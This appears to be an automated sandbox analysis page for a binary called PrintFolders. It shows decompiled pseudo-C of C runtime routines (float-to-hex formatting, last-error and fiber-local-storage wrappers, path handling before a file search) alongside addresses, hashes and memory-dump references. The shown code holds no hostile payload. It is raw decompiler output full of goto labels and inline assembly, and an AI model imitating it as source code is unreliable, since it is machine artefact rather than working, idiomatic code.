				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				_t4 =  &_a36; // 0x414855
				 *_t177 = 0;
				E00413621( &_v60, _t163,  *_t4);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t18 = _t177 + 1; // 0x2
							_t165 = _t18;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t26 =  &(_t165[0]); // 0x2
								_t178 = _t26;
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E0042BF40( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E0041F954(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t50 = _t178 - 1; // 0x2
									_t118 = _t50;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E00410B00(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E0042BF40( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t168 = _t105 + 2;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E0042BE40();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E0042BE40();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E0042BE40();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t174 = _t168 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E0041F448(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E0042BFF0(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E004135F1(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E00413517();
				goto L66;
			}

0x0041f139
0x0041f144
0x0041f149
0x0041f14b
0x0041f14b
0x0041f14f
0x0041f155
0x0041f158
0x0041f15a
0x0041f15f
0x0041f162
0x0041f165
0x0041f17b
0x0041f17e
0x0041f183
0x0041f18d
0x0041f192
0x0041f1e9
0x0041f1eb
0x0041f1fa
0x0041f1fd
0x0041f1fd
0x0041f200
0x0041f202
0x0041f209
0x0041f21b
0x0041f21e
0x0041f223
0x0041f227
0x0041f228
0x0041f248
0x0041f24b
0x0041f24b
0x0041f24b
0x0041f24d
0x0041f24d
0x0041f24d
0x0041f250
0x0041f253
0x0041f255
0x0041f266
0x0041f257
0x0041f257
0x0041f257
0x0041f268
0x0041f26d
0x0041f26d
0x0041f272
0x0041f275
0x0041f27f
0x0041f281
0x0041f283
0x0041f288
0x0041f289
0x0041f28c
0x0041f28f
0x0041f292
0x0041f292
0x0041f294
0x00000000
0x00000000
0x0041f2ab
0x0041f2b2
0x0041f2b6
0x0041f2b9
0x0041f2bc
0x0041f2be
0x0041f2be
0x0041f2be
0x0041f2c4
0x0041f2c7
0x0041f2cb
0x0041f2cd
0x0041f2d1
0x0041f2d4
0x0041f2d7
0x0041f2d8
0x0041f2db
0x0041f2de
0x0041f2e1
0x0041f2e1
0x0041f2e6
0x0041f2e9
0x0041f2ec
0x00000000
0x00000000
0x0041f2f5
0x0041f2fa
0x0041f2fd
0x0041f2ff
0x00000000
0x00000000
0x0041f303
0x0041f303
0x0041f306
0x0041f307
0x0041f307
0x0041f309
0x0041f30c
0x00000000
0x00000000
0x0041f30e
0x0041f311
0x0041f318
0x0041f31b
0x0041f31e
0x0041f333
0x0041f333
0x0041f333
0x0041f320
0x0041f320
0x0041f323
0x0041f32d
0x0041f32d
0x0041f325
0x0041f328
0x0041f328
0x0041f32f
0x0041f32f
0x00000000
0x0041f31e
0x0041f313
0x0041f313
0x0041f315
0x0041f315
0x0041f277
0x0041f277
0x0041f279
0x0041f336
0x0041f336
0x0041f338
0x0041f33a
0x0041f33d
0x0041f33e
0x0041f33f
0x0041f340
0x0041f348
0x0041f348
0x0041f34a
0x0041f34a
0x0041f34d
0x0041f350
0x0041f353
0x0041f355
0x0041f357
0x0041f357
0x0041f364
0x0041f36b
0x0041f372
0x0041f374
0x0041f37d
0x0041f37d
0x0041f380
0x0041f382
0x0041f385
0x0041f388
0x0041f394
0x0041f394
0x0041f398
0x0041f39b
0x0041f39d
0x00000000
0x0041f38a
0x0041f38a
0x0041f390
0x0041f390
0x0041f39e
0x0041f39e
0x0041f3a1
0x0041f3a5
0x0041f3a6
0x0041f3a8
0x0041f3aa
0x0041f3ac
0x0041f3d6
0x0041f3d6
0x0041f3d8
0x0041f3e5
0x0041f3e5
0x0041f3e6
0x0041f3e7
0x0041f3e9
0x0041f3eb
0x0041f3f0
0x0041f3f2
0x0041f3f6
0x0041f3f9
0x0041f3fc
0x0041f3fe
0x0041f3ff
0x0041f3ff
0x0041f401
0x0041f401
0x0041f403
0x0041f410
0x0041f410
0x0041f411
0x0041f412
0x0041f414
0x0041f415
0x0041f416
0x0041f41f
0x0041f422
0x0041f424
0x0041f425
0x0041f425
0x0041f427
0x0041f427
0x0041f427
0x0041f42a
0x0041f42c
0x0041f42f
0x0041f431
0x0041f437
0x0041f43c
0x0041f43c
0x0041f447
0x0041f447
0x0041f405
0x0041f407
0x00000000
0x00000000
0x0041f409
0x00000000
0x00000000
0x0041f40b
0x0041f40e
0x00000000
0x00000000
0x00000000
0x0041f40e
0x0041f3da
0x0041f3dc
0x00000000
0x00000000
0x0041f3de
0x00000000
0x00000000
0x0041f3e0
0x0041f3e3
0x00000000
0x00000000
0x00000000
0x0041f3e3
0x0041f3ae
0x0041f3b3
0x0041f3b9
0x0041f3b9
0x0041f3ba
0x0041f3bb
0x0041f3bc
0x0041f3be
0x0041f3c3
0x0041f3c5
0x0041f3c7
0x0041f3cc
0x0041f3cf
0x0041f3d1
0x0041f3d4
0x0041f3d4
0x00000000
0x0041f3d4
0x0041f3b5
0x0041f3b7
0x00000000
0x00000000
0x00000000
0x0041f3b7
0x0041f38c
0x0041f38e
0x00000000
0x00000000
0x00000000
0x0041f38e
0x0041f388
0x00000000
0x0041f279
0x0041f275
0x0041f22a
0x0041f236
0x0041f236
0x0041f238
0x0041f23f
0x00000000
0x0041f23f
0x0041f23a
0x00000000
0x0041f23a
0x0041f1ed
0x0041f1f3
0x0041f1f3
0x0041f1f6
0x0041f1f6
0x0041f1f7
0x00000000
0x0041f1f7
0x0041f1ef
0x0041f1f1
0x00000000
0x00000000
0x00000000
0x0041f1f1
0x0041f1af
0x0041f1b4
0x0041f1b6
0x0041f1c3
0x0041f1ca
0x0041f1cc
0x0041f1d7
0x0041f1d7
0x0041f1da
0x0041f1dc
0x0041f1dc
0x0041f1e0
0x0041f1b8
0x0041f1b8
0x0041f1b8
0x00000000
0x0041f1b6
0x0041f167
0x0041f16e
0x0041f16f
0x0041f171
0x00000000

APIs

_strrchr.LIBCMT ref: 0041F1C3

Strings

UHA, xrefs: 0041F155

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: UHA
API String ID: 3213747228-2890760514
Opcode ID: ea010ae931ad1b145e5fd3dfd9d8e6290a85c3b5d9bd79e2341eb9072933dd63
Instruction ID: 45e9e1605b069a012dfbc5f54e827baf5efa537bc91593008a961953a6f8b556
Opcode Fuzzy Hash: ea010ae931ad1b145e5fd3dfd9d8e6290a85c3b5d9bd79e2341eb9072933dd63
Instruction Fuzzy Hash: 01B13671A002559FDB11CF68C881BEFBBA5EF55344F2541BBE854AB342D2388D8BC768

Uniqueness

Uniqueness Score: -1.00%

Function 100048EA Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E100048EA(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x10017020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E10005AAB(_t13, __eflags,  *0x10017020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E10005AE6(_t14, __eflags,  *0x10017020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E10007782();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E10005AE6(_t18, __eflags,  *0x10017020, 0);
								} else {
									_t8 = E10005AE6(_t18, __eflags,  *0x10017020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E100069B0(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x100048ea
0x100048f1
0x10004904
0x1000490b
0x1000490d
0x1000490e
0x10004911
0x1000492a
0x1000492a
0x10004913
0x10004913
0x10004915
0x1000491f
0x10004926
0x10004928
0x1000492f
0x10004938
0x1000493b
0x1000493c
0x1000493e
0x10004952
0x10004952
0x1000495b
0x10004940
0x10004947
0x1000494d
0x1000494e
0x10004950
0x10004964
0x10004966
0x10004966
0x00000000
0x00000000
0x00000000
0x10004950
0x10004969
0x00000000
0x00000000
0x00000000
0x10004928
0x10004915
0x10004971
0x1000497b
0x100048f3
0x100048f5
0x100048f5

APIs

GetLastError.KERNEL32(00000001,?,100046F1,100038AA,100032A7,?,100034DF,?,00000001,?,?,00000001,?,10015758,0000000C,100035D8), ref: 100048F8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10004906
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000491F
SetLastError.KERNEL32(00000000,100034DF,?,00000001,?,?,00000001,?,10015758,0000000C,100035D8,?,00000001,?), ref: 10004971

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7a07fe8dd6e183f70e1ed33fe8cb46bc5f72bd9116114fb4a898372d9b8b1887
Instruction ID: aa6f2bb6e0f81693f4a69917c870ce6a712f51b8e9c958d3c9a19b96842cdbe6
Opcode Fuzzy Hash: 7a07fe8dd6e183f70e1ed33fe8cb46bc5f72bd9116114fb4a898372d9b8b1887
Instruction Fuzzy Hash: 5D01287760D322AEF211C7746CC960B26A5FB096F57224339F514511F9EF619C019248

Uniqueness

Uniqueness Score: -1.00%

Function 00411DA4 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00411DA4(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x43d080 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E004130D0(_t13, __eflags,  *0x43d080);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E0041310B(_t14, __eflags,  *0x43d080, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E0041949E();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E0041310B(_t18, __eflags,  *0x43d080, 0);
								} else {
									_t8 = E0041310B(_t18, __eflags,  *0x43d080, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00415F78(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x00411da4
0x00411dab
0x00411dbe
0x00411dc5
0x00411dc7
0x00411dc8
0x00411dcb
0x00411de4
0x00411de4
0x00411dcd
0x00411dcd
0x00411dcf
0x00411dd9
0x00411de0
0x00411de2
0x00411de9
0x00411df2
0x00411df5
0x00411df6
0x00411df8
0x00411e0c
0x00411e0c
0x00411e15
0x00411dfa
0x00411e01
0x00411e07
0x00411e08
0x00411e0a
0x00411e1e
0x00411e20
0x00411e20
0x00000000
0x00000000
0x00000000
0x00411e0a
0x00411e23
0x00000000
0x00000000
0x00000000
0x00411de2
0x00411dcf
0x00411e2b
0x00411e35
0x00411dad
0x00411daf
0x00411daf

APIs

GetLastError.KERNEL32(?,?,00411D9B,0041019F,0040F7D9), ref: 00411DB2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00411DC0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00411DD9
SetLastError.KERNEL32(00000000,00411D9B,0041019F,0040F7D9), ref: 00411E2B

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 45bd82ce1dbd3c8e72b1b680d8146cb8cc17257a2e8ce5ccc350ce85e15801c5
Instruction ID: 538d6b09e676f6115927efde8c1f2b3b6cae1e07978b049f78eb883490b1d345
Opcode Fuzzy Hash: 45bd82ce1dbd3c8e72b1b680d8146cb8cc17257a2e8ce5ccc350ce85e15801c5
Instruction Fuzzy Hash: 3C01F7327093216EA7292BB67C85AE72B94FB05B7AB20033FF610852F1EF595C93514C

Uniqueness

Uniqueness Score: -1.00%

Function 00423C3E Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00423C3E(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E0041A597(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E00427ECC(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E00413544();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E0041E25B(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E00427ECC(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E00424171(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E0041E2B8(_t300);
														_t302 = _v12;
													}
													E0041E2B8(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E00427ECC(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00413544();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x43d054; // 0x7bd02ead
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E0042B110(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E00419D5B(_t244 - _t287 + 1, _t287,  &_v676, E00423B18(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
